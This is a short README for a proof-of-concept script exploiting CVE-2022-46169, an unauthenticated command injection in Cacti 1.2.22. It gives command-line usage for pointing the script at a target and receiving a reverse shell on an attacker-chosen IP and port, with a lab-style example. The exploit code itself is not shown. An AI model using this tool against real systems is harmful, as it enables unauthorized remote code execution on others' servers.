This is a Proof of Concept (POC) script for the CVE-2022-46169 vulnerability that affects Cacti version 1.2.22.
The CVE-2022-46169 vulnerability allows an unauthenticated command injection in Cacti versions through 1.2.22 in order to achieve unauthenticated remote code execution as the www-data user. The vulnerability is caused by improper validation of user input in the "host_id" parameter of the "remote_agent.php" file.
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>Replace <TARGET_URL> with the URL of the target Cacti installation, <YOUR_IP> with the IP address of the machine where you want to receive the reverse shell, and <YOUR_PORT> with the port number where you want to receive the reverse shell.
Example:
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337This POC script is for educational purposes only. Use it at your own risk. The author of this script is not responsible for any damage caused by the use of this script. References
CVE-2022-46169 - CVE entry for the vulnerability.
Cacti Security Advisories in Github